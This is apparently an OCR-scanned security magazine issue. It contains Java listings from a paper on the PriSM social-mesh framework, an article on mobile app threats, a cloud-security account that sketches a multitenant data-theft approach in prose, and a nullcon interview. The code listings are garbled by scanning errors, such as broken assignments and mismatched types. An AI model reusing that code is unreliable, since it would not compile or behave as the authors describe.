List<Rule> circleRules = circleManager . getCircleRules (analyzedCircle) ; 

// find the most specific rule 

int maxMatching = 0; 

for (Rule rule : circleRules) { 

if (maxMatching < rule. size ()) { 

int i = rule . check (user , userCircle, post); 
if (i > maxMatching) { 
maxMatching = in- 
action = rule . getAction ( ) ; 

} 




} catch (CircleNotExistingException e) { 

logger . warn ( "Circle " + analyzedCircle + " was not found!"); 

break; 

} catch (DataSourceException e) { 

logger . error ( "DataSourceException" , e) ; 

break; 

} 

// if can cross the border 

if (action . equals (Action . ALLOW) ) { 
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Step (8) is executing using interfaces similar to 
the ones shown in Listing 1 (for the client side, 
which is sending the message) and Listing 2 (for 
the server side, which is receiving the message). 

The source code executing step (3) in the Ac- 
cess Control Manager is shown in Listing 4. As one 
may notice, at first we verify that the user is not a 
member of one of the denied circles and then we 
evaluate, for each circle, if there is at least a path 
from that circle to the outside allowing the reading 
user to access the message. 

The code presented in Listing 4 is not optimal. 
We present this version of the code for the sake 
of simplicity. In order to optimize the operation ex- 
ecuted by the method iscontentviewabie o we could 
use different threads to parallelize the computa- 
tion of the path ascending from each tagged cir- 
cle. Moreover, it is possible to further speed up the 
computation of such paths by means of a shared 
list of visited paths to stop the computation of a 
path if one of its step had already been previously 
evaluated by another thread (Listing 4). 

Notification System 

The promptness of a system is a crucial feature to 
provide a satisfying user experience. 

This means both that the website responds to 
the commands issued by the user and that the 
interface updates itself accordingly to the events 
generated by other users. 



HTML 5 provides an interesting feature called 
WebSocket which allows the server to send unso- 
licited data to the client. Unfortunately, such fea- 
ture is not currently supported by all the major 
browsers and therefore we needed to use another 
approach to make PriSM's interface more respon- 
sive to the modification of the system. 

We chose to implement a personalized version 
of the so-called HTTP Push. 

HTTP Push is a technique allowing a server to em- 
ulate that it is pushing data to the client using a pull 
request which blocks on the server-side (Figure 7). 



Client Server 
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Wait 



{data}... 



Wait 



{data}....- 
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Figure 7. HTTP Pull vs HTTP Push 



Client Server 
,GET 



Wait 



{data}... 



Wait 



{data}...- 



Wait 



PUSH 



Listing 4b. Frontier-based information flow mechanism: the code 

try { 

/ / get the parent 

CircleData circleData = circleManager . getCircleByld (analyzedCircle) 
analyzedCircle = circleData . getParent () ; 
} catch (DataSourceException e) { 

logger . error ( "Reading details for " + analyzedCircle); 
break; 

} catch (CircleNotExistingException e) { 

logger . warn ( "Circle " + analyzedCircle + " was not found!"); 
break; 

} 

} else { 

// else try with the next tagged circle 
break; 

} 

} while (null != analyzedCircle); 



return false; 
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Listing 5. The client-side code for retrieving new notifications 

private void getNewNotification ( ) { 

clientFactory . getDataProvider ( ) . getNewNotification (new AsyncCallback<Map<NotificationT 
ype, List<? extends ID»>() { 

@Override 

public void onSuccess (Map<NotificationType, List<? extends ID>> result) { 
int tot = 0; 

if (result . keySet ( ) . contains (NotificationType . U PDA TE_ R OLE ) ) 
... /* update the privileges */ ... 

if ( result . keySet ( ) . contains (NotificationType . CONTENT_CREATED) || result . keySet () . 
contains (NotificationType . CONTENT_ SEL F_ CREA TED ) ) 
clientFactory . getEventBus ( ) . fireEvent (new NewContentEvent ( ) ) ; 

if ( result. keySet () .contains (NotificationType. CONTENT_COMMENTED) || result. 
keySet ( ) . contains (NotificationType . C ONTENT_ SEL F_ C OMMENTED ) ) 
clientFactory . getEventBus ( ) . fireEvent (new NewCommentEvent ( ) ) ; 
//sum up except self created content 
for (NotificationType type : result . keySet () ) { 

if ( ! type . equals (NotificationType . CONTENT_SELF_CREATED) && ! type . 
equals (NotificationType . C ONTENT_ SEL F_ C OMMENTED ) ) { 
tot += result . get (type) . size () ; 
} 

} 

if ( tot > 0 ) 

view . getNotificationLinkText ( ) . setText ( "Notification ["+tot+"]") ; 
else 

view . getNotificationLinkText ( ) . setText ( "Notification" ) ; 
getNewNotificationNo () ; 

} 

@Override 

public void onFailure (Throwable caught) { 

/* handle a failure propertly */ 

} 

}) ; 

} 

Listing 6. The server-side code for retrieving new notifications 

public class DataProviderlmpl implements DataProvider { 

private NotificationList notifications; 

@0verride 

public Map<NotificationType, List<? extends ID>> getNewNotification ( String username) throws 
DataSourceException { 
notifications . get (username) ; 

return dataSource . getNewNotification (username) ; 

} 
} 
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Listing 7. NotificationLists, the class managing the push 
simulation 



public class NotificationLists { 

private Map<String, NotificationSync> notifi- 
cationListener; 
private static final long TIME = 30000; 

public NotificationLists ( ) { 
notificationListener = new 
HashMap<String, NotificationCounter> ( ) ; 



public void get (String username) { 
NotificationCounter c = null; 

synchronized (notificationListener) { 
c = notificationListener .get (username) ; 
if (null == c) { 

c = new NotificationSync () ; 
notificationListener .put (username, c) ; 



synchronized (c) { 

if (Ic.getO) 
try { 

c.wait {TIME) ; 
} catch (InterruptedException e) { 
/ / something interrupted 
this thread. Just live 
with it. 

} 

c . clean ( ) ; 



public void add (String username) { 
NotificationCounter c = null; 
synchronized (notificationListener) { 
c = notificationListener. 

get (username) ; 
if (null == c) 
returns- 



synchronized ( c ) 

c . add ( ) ; 

c . notified ( ) ; 

c.notifyAll () ; 
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PriSM web-interface executes a sort of background 
thread that queries the server for new notifications. 
We define as notification each event that modified the 
state of the server and that is of some relevance for 
the user. Examples of notification are new messag- 
es, modification of the membership status of some 
circle and updates to the privileges of a role. 

Listing 5 shows the client-side code handling the 
requests. We remind that the presented code is 
written in Java but is compiled to JavaScript by the 
GWT compiler. One may notice that the method 
getNewNotificationo queries repetitively the server, 

calling the method ci ient Factory . getDataProvider ( ) . 
getNewNotif ication () not even waiting between the 
requests. 

This is possible because the method actually exe- 
cuting the remote request will not return immediate- 
ly. Listing 6 and 7 show how we made this possible. 

Listing 6 shows the server side code that is execut- 
ed Upon the Call OfclientFactory. getDataProvider () . 
getNewNotificationo On the Client. 

Such a method is called q e tNewNotif ication () and 
its body is very simple. First of all it calls the get o 
method of the class Not if icationList and then re- 
trieves the new notification, if any, from the data- 
source. 

Listing 7, on the other hand, shows the class 
Not if icationList. It consists of a Map which is used 
to coordinate the notification system. 

When the ge to method is invoked the 
Not if icationList retrieves the NotificationSync as- 
sociated with the user, or it creates it if it does 
not exist. After that, the method geto of the 
NotificationSync object is invoked. Such method 
will then put the thread executing the request (on 
the server) on wait for up to 30 seconds. Thus, the 
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get o method will not return unless another thread 
wakes up its thread or 30 seconds are over. 

The thread can be woken up by means of a call 
of the method addo of the Not if icationList object, 
which is called every time a new notification for the 
user is created. 

The average timeout for an HTTP connection is 
around 60 seconds but we chose a shorter waiting 
time to reduce the probability of connection errors 
due to communication and/or server delays. 

Conclusion 

In this article, we presented PriSM, a framework 
for creating social meshes among autonomous 
social networks which can be deployed and cus- 
tomized according to the need of individual organi- 
zations. We presented some of its feature accom- 
panied with snippets of the actual code to realize 
the same. While PriSM has been designed to cater 
primarily for organizational usage, its core compo- 
nents can also be utilized in order to realize a de- 
centralized peer-to-peer online social networking 
platform [10]. 
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Mobile Applications 

Are you Prepared to Carry the Risk? 

Addressing Today's Top Three Mobile Application Threats 

There is no question that mobile computing is growing at 
an exponential rate. This rapid transformation has caused 
security concerns to be outpaced by the ease of use, flexibility, 
and productivity of mobile devices. When vulnerabilities are 
exploited, the security of mission-critical data becomes a serious 
threat. 



Gain insight into the top three mobile ap- 
plication security threats facing organiza- 
tions today and receive recommendations 
for mitigating associated risk. 

Background 

According to Morgan Stanley research, by the end 
of 2012, more smartphone units will be sold than 
desktops and laptops combined ("Ten Questions 
Internet Execs Should Ask & Answer"; Morgan 
Stanley Technology Research Presentation by An- 
alyst Mary Meeker; Web 2.0 Summit, San Francis- 
co, CA; Nov. 16, 2010). It has been a remarkable 
and rapid transformation that, much like the advent 
of the web, has left security concerns outpaced by 
the ease of use and flexibility of a new tool. 

Therefore, the HP Fortify on Demand Manual 
Testing Team analyzed security threats associated 
with a number of mobile applications to identify the 
most common vulnerabilities. 



You'll learn 

• Mobile applications are just as prone to security 
vulnerabilities as their web counterparts. 

• Insecure use of mobile API's, data exposure in tran- 
sit and at rest, and other serious threats make this 
shift to mobile computing a top concern for busi- 
nesses today. 

• The top three mobile application security threats 
observed in a sample set. 

• Recommendations on how to mitigate the risk of 
security vulnerabilities in mobile computing. 



The HP Team found that applications on mobile 
devices are just as prone to security vulnerabili- 
ties as their web counterparts. There were numer- 
ous instances of insecure use of mobile API's, data 
exposure in transit and at rest, and other serious 
threats. This analysis outlines the top three secu- 
rity concerns discovered in the survey sample set, 
along with recommendations as to how organiza- 
tions can mitigate the associated risk. 

Sensitive Data Leakage Over Insecure 
Channels 

The HP Team analysis discovered that more than 
half of applications tested (51%) were susceptible 
to information leakage vulnerabilities. A user's per- 
sonal data was often sent over unencrypted net- 
work protocols such as HTTP. Much of this infor- 
mation was basic, such as names, addresses, and 
phone numbers; however, it also included the cur- 
rent location of the user and the specific device 
identifier (aka the UDID). If an attacker were able 
to obtain all of this information, they would be able 
to physically locate a 'target' in the real world. The 
potential implications of this can be staggering. 

Less dramatic, but equally concerning would be 
a situation involving application exploitation: if the 
application has been sending the UDID, full name, 
address, etc., to a vulnerable web service, and that 
web service was susceptible to SQL Injection, then 
every bit of data on that mobile device could be ac- 
cessed. 
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Data transmitted over insecure channels is not 
limited to personal data - application data is al- 
so susceptible. The team found that log in infor- 
mation, user credentials, session ID's, token, s 
and sensitive company data were all being sent 
over unencrypted network protocols like HTTP. 
The consequences for a vulnerable banking ap- 
plication could be devastating. If credentials, ses- 
sion identifiers, personaly identifiable information, 
or other sensitive data was being transmitted to a 
backend server, the transmission must be secure. 
Otherwise, data could be intercepted by an attack- 
er, using common network packet capturing tools 
or applications (e.g. DroidSheep). 

The analysis also revealed that as much as 75% 
of the applications tested were capable of sending 
tracking data to third party advertising and analyt- 
ics providers. While not technically a vulnerabili- 
ty, this does offer more attack vectors for a poten- 
tial attacker if those providers are themselves not 
secure, or are sending the data over an insecure 
connection. Mobile application developers should 
consider the security of everything their applica- 
tions can communicate with, not just their own ap- 



plications. This extends to every third party service 
or library they used to build applications. 

Lost / Stolen Devices 

Devices get lost. Devices are stolen. This is not 
new and will certainly continue, but with the prolif- 
eration of mobile computing, the effort that organi- 
zations put into securing vulnerabilities introduced 
by lost or stolen devices has become more front 
and center. 

Encryption on corporate computers is now stan- 
dard protocol for most Fortune 500 companies. 
Ten years ago the news was filled with stories of 
data stolen from lost PC's. This has definitely re- 
duced, in part because of legislative requirements, 
but also because corporations have learned their 
lessons the hard way. However, these same stan- 
dards are not applied to mobile devices, and in the 
age of Bring Your Own Device (BYOD) to work, 
this is still a critical problem that needs attention. 

Mobile applications present unique areas of risk 
when a device they are running on is lost or sto- 
len. 68% of the applications tested in this analysis 
did not secure the data stored on the device. As a 
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result, attackers were able to obtain elevated privi- 
leges on a stolen device to access sensitive appli- 
cation data. 

A method to reduce the risk is to ensure that all 
credentials stored on a mobile device be either en- 
crypted on Android or stored to the Keychain on 
iOS. Application sandboxing (limiting the resourc- 
es the application can access) and code sign- 
ing (putting restrictions in place to guarantee the 
code has not been altered) can help mitigate this 
in most scenarios as well. However, these can be 
bypassed by common device rooting (gaining priv- 
ileged control) and jail-breaking techniques, giving 
the attacker total access to the entire file system of 
the device. 

Malicious Applications 

In addition to protecting mobile applications from 
outside agents, mobile applications must also now 
be protected from other applications stored on the 
same device. Nearly a quarter (24%) of the appli- 
cations the team tested logged or stored sensitive 
data on the device that was readable by other non- 
privileged applications on the device. 

Ten percent of the applications tested allowed 
attacks via inter-application communication or via 
weak permissions. Malicious applications can typi- 
cally only access another application's data if the 
data was stored world-readable (e.g. SD card) or if 
the application logged any sensitive data. If a mali- 
cious application is able to load code that can el- 
evate privileges, it may be able to completely com- 
promise another application's data. 

Inter-application communication can occur on 
most operating systems. 

For Android, developers should use the principle 
of least privilege and only define necessary per- 
missions in AndroidManifest.xml for the applica- 
tion to function properly. Caution should be exer- 
cised when sending implicit Intents and exporting 
components. Explicit Intents should be used when 
possible. Exporting components should be avoid- 
ed unless absolutely necessary. Furthermore, sen- 
sitive data should never be allowed to be written to 
world-readable/writable files or stored to the SD- 
Card. 

For iOS, developers should validate the source 
bundle identifier to the open URL method when im- 
plementing custom protocol handlers. All sensitive 
logging calls should be disabled for applications in 
production. 

Recommendations 

There are certain actions that organizations can 
take to mitigate the risk of mobile application se- 



curity vulnerabilities. First, applications need to be 
manually audited and assessed before products 
are launched. This allows organizations to deter- 
mine if any input injection vulnerabilities or infor- 
mation leakage vulnerabilities are present. The 
code should be analyzed via static analysis when 
being developed to find code-based vulnerabilities. 
As with any application, it is much more cost effec- 
tive to address security vulnerabilities during de- 
velopment rather than after it has been released. 

Secure data transmission standards should be 
included as part of any application's requirements, 
especially if an application is being developed by a 
third-party. The same goes for secure data storage 
and application logging. Reasonable inter-applica- 
tion communication exposure and permissions in 
application requirements should be stringently de- 
fined. These concerns should all be addressed in 
the requirements phase and tested during devel- 
opment. 

Lastly, when performing security testing and 
analysis on mobile applications, the server-side 
web services and APIs that the mobile clients talk 
to should be taken in context and analyzed for vul- 
nerabilities. High-risk vulnerabilities may be missed 
if the two are tested out of context with each other. 



MARK PAINTER 

Mark Painter has been in the security industry since 
2002, when he joined SPI Dynamics. During his ten- 
ure, he has focused on vulnerability research, product 
management, and social media. Painter is currently the 
Product Marketing Manager for the HP Fortify Webln- 
spect product suite as well as HP Fortify on Demand pro- 
fessional services. 
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How Has the Real 
Cloud Evolved? 

A Peek Inside the "Cloud" 

The anticipated revenue for "Cloud Computing" is $55 billion by 
2014, according to technology research firm IDC. 
Yes. . . We in InfoSec hear it all the time. . . 



The common response to "There is no such 
thing as a secure cloud that you do not host 
yourself statement is... 

"You security people ore oil just paranoidl" 

But let's look at the facts: 

• Apple iCIoud Breached August 2012 

• Episilon April 2011 (with customer data from Abe 
Books and American Express possibly stolen). 

• Microsoft Cloud Data Breach December 2010 

• Dropbox Breach in July 2012 

As far as public cloud offerings it is a matter of 
"when" and not "if," a breach will occur and how 
much will be lost. Wikipedia defines the "Cloud" as: 

Cloud computing is the use of computing resourc- 
es (hardware and software) that are delivered as 
a service over a network (typically the Internet). 
The name comes from the use of a c/ouc/-shaped 
symbol as an abstraction for the complex infra- 
structure it contains in system diagrams. Cloud 
computing entrusts remote services with a user's 
data, software and computation. 

I deeply suspected this since the concept of the 
"Cloud" became a viable offering, but, the last cou- 
ple of years have allowed me to see specific vul- 
nerabilities in the real world and also gain some 
understanding on how they came about. Let me 
describe the evolution of a real "Cloud" provid- 



er environment. This environment included over 
7,000 servers (bare metal and virtual) and was 
spread over 15 data centers. 

In this particular example the "Cloud" offering 
took the form of laaS and SaaS (Infrastructure 
and Software as a Service). A framework replete 
with policies and procedures for a secure offering 
were put in to place. The policies may not have yet 
reached maturity but at least there was some effort 
made to provide for some basic security and com- 
pliance needs. The real problems began due to a 
lack of understanding by leadership as to the re- 
quirement to maintain the security framework even 
under duress. When any network or server prob- 
lem occurred (severe enough for the customer to 
complain about it) members of leadership "pulled 
out all the stops" as it were and demanded imme- 
diate action to resolve the issue directing that re- 
sponse personnel perform tasks that would com- 
promise the integrity of the security framework. 
These included opening permissions up to Read/ 
Write/Execute for Everyone in case permission 
restrictions might have been part of the problem. 
This was always done as a "temporary" fix to be 
corrected later but "later" never seemed to come 
and more pressing matters always precluded re- 
visiting any issue that was deemed "solved" from a 
customer complaint perspective. 

The result became a "Swiss Cheese" network and 
server environment where almost all security mea- 
sures had been circumvented or negated by "quick 
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How has the Real Cloud Evolved? 



fixes". Further, the nature of the "cloud" is that many 
laaS and SaaS environments are multi-tenant and 
the removal of security controls in one customer en- 
vironment often results in exposing several other 
customers' environments to attack as well. 

Another common practice in this particular en- 
vironment was to allow the customer to write their 
own API calls in to the environment to extend the 
functionality of the SaaS environment. Because 
of this need, the customer was often granted un- 
necessarily lenient rights and access in the shared 
multitenant environment housing many other cus- 
tomer's software and data. To further exasperate 
the issue, there was no code review performed on 
customer code so programs with elevated privileg- 
es were allowed to run in the shared environments. 
This exposed all customer code and data in these 
shared environments to potentially malicious code 
as well as untested code that could cause acciden- 
tal destruction and outages. At one point, there was 
a code review board set up, but time constraints 
rendered them useless as they were not given time 
away from their regular duties to spend the time 
necessary to thoroughly review the code before it 
was run in the shared environment. The result was 
a "rubber stamp" approach to code approval. 

DNS Services were perhaps one of the great- 
est risks the "Cloud" provider faced. They were run- 
ning standard DNS on Microsoft Domain Controllers 



whose versions carried as far back as NT4 Server. 
Additionally, over 180 personnel had admin access 
to the DNS Servers and zones. Many were contrac- 
tors, some of which no longer worked for the provid- 
er. Almost every DNS server had direct access out to 
the internet and forwarders were configured to sever- 
al upstream servers. There was no overall DNS strat- 
egy and many zones were duplicated. Many host 
entries actually pointed to servers in China and Rus- 
sia (evidence of compromised DNS). Upon monitor- 
ing it was found that over 90% of all DNS queries 
were failing. All of this was kept from the customers 
of course. Remediation efforts were exasperated by 
the fact that no one had documentation or a real un- 
derstanding of the 250 plus DNS Servers running or 
which ones were performing lookups for which cus- 
tomers. Constant packet sniffing and monitoring had 
to be performed for months to watch all port 53 traf- 
fic to attempt to map DNS workflow so remediation 
could occur without outages. The active directory de- 
sign that controlled access to various customer re- 
sources and environments was poorly designed and 
many multitenant customers were simply given an 
OU with delegated control over their own OU for ac- 
cess. Many customers then demanded Domain Ad- 
min access claiming they must have it to resolve an 
emergency or troubleshoot an issue and it was often 
granted. This now gave them the control over the en- 
tire AD Domain including the OUs of several other 
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customers. Eventually, most customers had this level 
access and so they had "god rights" to all customers 
in the multitenant environment. 

Additional risk to the "Cloud" offering came from 
the fact that there was much offshore support (not 
an issue in and of itself but security control at many 
of these locations was tenuous at best). The turn- 
over at the offsite support locations was high and 
often security controls were bypassed completely 
by staff at these sites that had demands placed on 
them by their local leadership. The demands often 
centered around expediency at the cost of follow- 
ing policy and procedure. On some occasions se- 
curity controls were completely circumvented for 
ease of use and convenience. At one location a 
back door internet connection was set up and a 
rogue proxy server installed to speed up internet 
speeds and bypass content filtering. 

Another risk that stemmed from this support 
model revolved around the access to the data 
center via a large scale VDI environment. The off- 
shore support teams accessed the production en- 
vironment via a VDI framework (over ICA or RDP) 
which ostensibly was maintained for patch levels 
and hardened to provide secure remote desktops 
to perform their support functions. In reality, these 
remote desktop images were rarely updated or 
maintained because the support staff for them was 
"busy," which resulted in them falling woefully be- 
hind on patch levels and many vulnerabilities being 
exposed. Many of these were left up and running 
for years at a time and became infected with vari- 
ous malware and malicious code resulting in com- 
promised desktops with elevated privileges and 
access into customer production environments. 

Backups of customer data were encrypted at 
least but encryption keys to backup controllers 
for older data had been lost and much of the cus- 
tomer data could not be recovered if the customer 
demanded it. This caused an issue on one occa- 
sion but it was covered up by saying that particular 
backup tape had been corrupted and it would not 
happen again. Fines were paid for a minor SLA 
violation and life went on. In addition, the backup 
framework was severely oversubscribed and ap- 
proximately 30% of all backups failed each night. 
Plans were always in the works to upgrade the 
backup infrastructure but pressing customer mat- 
ters always seem to put implementation on hold 
and no substantive action was taken for months. 

Customers were never notified as breaches 
were found and more effort was made to cover 
up breaches and risk then to remediate problems. 
There were some rudimentary security controls 
and solutions in place and these were loudly tout- 



ed to customers who visited the facilities. The fact 
is that these were often misconfigured or that their 
scope did not even encompass the customer en- 
vironment and this was never mentioned. Most of 
these solutions were nothing more than a smoke 
screen to appear secure but had little benefit to the 
customer data or environment. 

A simple way to perform a comprehensive at- 
tack in this environment would be to start a small 
company and subscribe to the cloud provider as a 
multitenant customer. This could be done with lit- 
tle initial investment by a group of hackers or by a 
state sponsored team of hackers. Then you could 
perpetrate complex attacks over time utilizing the 
multitenant environment and elevated privileges 
to access data from many customers harvesting 
millions of dollars' worth of data. Additionally, you 
could write a code that would exploit the environ- 
ment and have the "Cloud" provider run the code 
in the multitenant environment as well. The code 
could harvest data over time and send it out in 
small encrypted packages over SSL to your exter- 
nal servers or back across your partner connection 
to the provider to your internal servers. This could 
easily be disguised as legitimate traffic. 

So what can be done to secure your data and 
compute within the cloud? Knowing all this, can you 
expect to store your data in a public "Cloud" with any 
hope of keeping it secure? Are "Cloud" provider's 
assurances of security enough to ease concerns? 

The obvious conclusion from all of this is that you 
cannot assume a secure place for your data and soft- 
ware in the "Cloud" if you do not control the "Cloud" 
environment. The best you can do is to demand to 
examine and audit the environment in the "Cloud" but 
you or your auditors may be met with a "guided tour" 
approach where shortcomings are concealed and a 
fagade of security is presented. One possible solu- 
tion is to encrypt your own data before it enters the 
"cloud" but even this in not guaranteed. If you have or 
process sensitive data I would strongly advise host- 
ing your own "Cloud" and not sending it out beyond 
the bounds of your direct control and review. 

EDDIE MIZE 

HP Eddie Mize has worked in the IT field for 
over 29 years and in Information Security 
for over 16 years. He has per- formed nu- 
' g merous Red Team operations and taught 
several classes on Red Team techniques. He 
has spoken publicly several times on Secu- 
rity and Compliance. He has performed penetration test- 
ing and Red Team operations for organizations with as 
many as 8000 servers and 15 data centers. Eddie enjoys 
speaking at DefCon and is on the staff for the conference. 
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Interview with 



Aseem Jakhar 



Ewa Duranc, Hakin9 Magazine Editor 
speaks with Aseem Jakhar the Founder of 
nullcon Security Conference. 




Ewa Duranc: Can you introduce yourself to 
our readers? 

Aseem Jakhar: I am currently the Director, Re- 
search at Payatu Technologies, a security services 
organization with expertise in product/application 
security assessment. I have 9 years of experi- 
ence in system programming, security research, 
consulting and managing security software devel- 
opment projects. Have worked on various securi- 
ty software including IBM ISS Proventia UTM ap- 
pliance, messaging/security appliance, anti-spam 
engine, anti-virus software, Transparent HTTPS 
proxy to name a few. An active speaker at various 
security and open source conferences including 
Defcon, Hack.lu, Blackhat, Xcon, Cyber security 
summit, Cocon, OSI Days, Clubhack, Gnunify. I 
am the author of open source Linux thread injec- 
tion kit - Jugaad and Indroid which demonstrate 
a stealthy malware infection technique and desk- 
tops OS and Android. I'm also known in the secu- 
rity community as the founder of null -The open 
security community, registered not-for-profit orga- 
nization http://null.co.in, the largest security com- 
munity in India. 

ED: Ok, Let's talk about nullcon Security 
Conference. What was the idea of creating 
it? 

AJ: nullcon was founded in 2010 with the idea of 
providing an integrated platform for exchanging 
information on the latest attack vectors, zero day 
vulnerabilities and unknown threats. Our motto - 
"The next security thing" drives the objective of the 
conference i.e. to discuss and showcase the future 



of information security and the next-generation of 
offensive and defensive security technology. The 
idea started as a gathering for researchers and 
organizations to brain storm and demonstrate why 
the current technology is not sufficient and what 
should be the focus for the coming years pertain- 
ing to information security. In addition to security, 
one of the section of the conference called De- 
si Jugaad (Hindi for "Local Hack") is dedicated to 
hacking where we invite researchers who come 
up with innovative security/tech/non-tech solu- 
tions for solving real life challenges or taking up 
new initiatives. 

ED: What are the type of events that 
happen at nullcon? 

AJ: nullcon is a 4 day summit. The first two days 
are dedicated to security training given by re- 
nowned security experts, followed by a two day 
conference which comprises of talks, workshops, 
hacking competitions, villages and after parties. 

Hacking Competitions 

We conduct three different types of hacking chal- 
lenges: 

• HackIM - The pre-con online competition 
(http://ctf.nullcon.net). The first three winners 
get free VIP passes for the conference. 

• Battle Underground - It runs during the con- 
ference over the cloud, so people who cannot 
participate in nullcon also get to take part in 
the challenge. 

• JailBreak - We started Jailbreak in 2012. It 
happens two days before the conference and 
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is a 36 hrs continuous in-house competition. 
The participating teams are kept under house 
arrest. They are given a main objective which 
can be either writing exploits, tools or finding 
vulnerabilities in software products. During the 
challenge the teams are given small puzzles 
to solve after every few hours and the team 
that cracks the puzzle first is allowed 15 mins 
to move out of their room and use the toilets, 
cook food and eat. The team that finishes the 
challenge is allowed to break free from the Jail. 
All teams are given 20 mins speaking slot dur- 
ing the conference to talk about their solution 
and the methodology used and the winners 
are selected by a panel of judges. The winning 
team takes away $$$. The last Jailbreak was 
amazing and we also shot the videos of the 
competition. Folks who are interested can take 
a look at: 

• JailBreak Teaser - http://www.youtube.com/ 
watch?v=xciUR9fUarU 

• JailBreak Episode 1 - http://www.youtube. 
com/watch?v=2Ehrv0_6wB0 

• JailBreak Episode 2 - http://www.youtube. 
com/watch?v=78GLbFVOb3g 

Workshops 

We are introducing workshops in the upcoming 
conference. The workshops will be free for the 
attendees and run parallel to the talks. We have 
some amazing workshops lined up for nullcon Goa 
2013. 

Villages 

These are informal learning sessions on tech/non- 
tech subjects where participants get direct hands- 
on on different subjects such as hardware, robot- 
ics, smartphone OS. 

Networking parties 

We make sure that delegates get a good feel of 
Goa and can network with peers and speakers in 
an informal setting. 

ED: What projects are you working on? 
Can you tell me about them? 

AJ: Nullcon keeps us busy for a good amount of 
time during the year. Other than the conference, 
we specialize in security assessment for applica- 
tions/products/telecom/mobile. We also do cus- 
tomized security training and consult on Secure 
SDLC process. Our clients include financial insti- 
tutions, security appliance, online product compa- 
nies, healthcare, telecom operators to name a few 
in Asia and Europe. 



ED: Nullcon Events date from 201 0. 
What topics do you cover during your 
conferences? Who attends them? 

AJ: We focus on upcoming and next generation 
offensive and defensive security technology. The 
topics range from APT, Cyber operations, to ex- 
ploitation of different technology and systems, 
cloud, telecom, hardware, web etc. We welcome 
anything new, interesting and that has a significant 
impact on security. 

The attendees are a mix of researchers, execu- 
tives, students and Govt, officials. We get a very 
good participation in terms of footfall from the 
Govt, sector in India. It is good to see that things 
are changing in the Govt, sector and officials are 
releasing the impact nullcon has in the overall de- 
velopment of information security awareness in 
the country. The awareness level in the corporate 
sector is also increase every year. 

ED: Let's move on to the upcoming 
conference? How many speakers do you 
have? 

AJ: Nullcon is not just a conference, it's an expe- 
rience by itself where we celebrate the achieve- 
ments of the security community with a lot of cut- 
ting edge learning. 

There are a few new events in the pipeline such 
as pre-con night hack talks, hardware villages. 
Various events during the conference include 

Talks 

We have more than 20 speakers with some really 
amazing content. 

Reboot Film 

We are honoured to have Joe Kawasaki, Director 
of reboot film at the conference where we will be 
showing the movie along with a Q&A session with 
Joe. 

Hacking Competitions 

• HackIM starts in mid Jan 2013 http://ctf. 
nullcon.net 

• Jailbreak will be held on 27-28th Feb 2013 

• Battle Underground will be held during the con- 
ference 1-2nd March 

P-A-R-T-Y 

A break from the high tech learning in the day to 
give you a good dose of Goa. 

• Speakers after dinner party - An informal wel- 
coming of all the speakers. 
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• Nullcon networking party - An invitation only 
party for speakers, volunteers and the Corpo- 
rate delegates on 1st March 2013. 

• A visit to Saturday night bazaar - An open 
air flee market, bars, DJs, Live bands on 2nd 
March 2013. 

Exhibition 

Yes, we have a full-fledged exhibition for security 
companies to come and showcase their products 
and services. 

Job Fair 

As part of the Exhibition we also organize a Job 
fair booth and assist organizations look for skilled 
professionals. Attendees drop their resumes and 
we share it with the organizations participating in 
the conference. It is a very economical and easy 
way to find the best resources in security. 

Workshops (1-2nd Mar 2013) 

• GSM Exploitation by Aaron deMello 

• Understanding Smart Malware by Shesh Sa- 
rangdhar 

• Introduction to Peach fuzzing framework by 
Adam Cecchetti, Deja Vu Security 

• Memory Forensic by Prince Boonlia 

Training (27-28th Feb 2013) 

Penetration Testing SmartGrid & SCADA by 
Justin Searle 

The Art of Exploiting Injection Flaws by Sumit 
Siddharth 

Xtreme Android Hacking by Aseem Jakhar 
Reverse Engineering and Malware Analysis by 
Abhishek Datta 
Xtreme Exploitation by Omair 
Mobile Application Hacking - Attack & Defense 
by Hemil Shah 

Xtreme Web Hacking by Akash Mahajan & Ri- 
yaz Walikar 

Cyber Warfare Intelligence and Intrusion Oper- 
ations by Atul Agarwal 

If that's not all, the beach is right next to the ven- 
ue so you can take a break anytime you feel like 
and stroll on the beach. 

ED: Why did you choose Goa as the venue? 

AJ: In India we have been to many conferences 
organized in IT hubs such as Bangalore, Delhi, 
Mumbai etc. The problem we see is that the del- 
egates are not able to concentrate on the talks 



due to their office work and many delegates have 
to unwillingly depart to their office in the middle 
of the conference because of some or the oth- 
er. We wanted a location where delegates will not 
bothered about going back to office and can also 
take time out from their busy schedule and con- 
centrate on what they have come to nullcon for 
i.e. learn, network and relax. We found Goa as 
the ideal place to host nullcon. Goa is one of the 
famous International destinations which attracts 
a lot of tourists from all over the world and for in- 
ternational security professionals we add the con- 
ference twist to the place, so every year they can 
take vacation to Goa and enjoy both the place as 
well as the conference. 

ED: How has the security scene in India 
changed over the years? 

AJ: Drastically. I remember the time when there 
were no avenues to learn, meet and network with 
security professionals in India and the difficulties 
of finding good mentors, content etc. Year by year 
we see an increase the no. of paper submissions 
from local researchers with some really amazing 
research which is also admired world over, but 
was hard to find earlier. In the late 90s and early/ 
mid 2000 there were closed groups and commu- 
nities and the information exchange was limited 
to them. And then nullcon happened! It worked as 
a catalyst to the networking of the security com- 
munity here. On a lighter note some people re- 
gard nullcon as the infosec hippie revolution (in a 
good way) because of the counter culture that it 
has brought in the information security and hack- 
ing scene. 

ED: What is null - The open security 
community? Tell us something about it? 

AJ: It all started back in 2008, we and a bunch of 
colleagues were discussing about active informa- 
tion sharing platforms in information security do- 
main. India being the global hub of software de- 
velopment, it was a little surprising that there were 
no active and open infosec communities. This cou- 
pled with the problems we faced during our learn- 
ing phase because of no one to talk to, mentor and 
guide us. We thought of starting a community with 
no boundaries i.e. anything security and hacking 
was welcome. The aim was to share knowledge 
and assist any organization with security related 
issues. 

null was the primary inspiration to start the 
nullcon Security Conference. 

We started the null mailing list in July-Aug 2008 
and made our first public appearance at Bar- 
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Camp Pune in Nov 2008, where we announced 
that we are starting physical null community meet 
ups in Pune. There were a few hackers and secu- 
rity professionals whose needs were answered 
by null and they joined in as volunteers. There 
has been no looking back since then. It has not 
been easy but has been a very interesting jour- 
ney. Null is now a registered non-profit society 
with over 2800+ members on the mailing list and 
more than 150 security professionals and hack- 
ers meet every month in different cities at the null 
meets. 

We currently have six active null chapters 
throughout India in major cities - Pune, Banga- 
lore, Mumbai, Delhi, Hyderabad and Chennai. Ev- 
ery chapter is run by 2-3 Moderators. The mod- 
erators decide the agenda of the monthly meets 
and make sure we have a suitable place for the 



Project KeedAJ 

A database of vulnerabilities found in the wild. Re- 
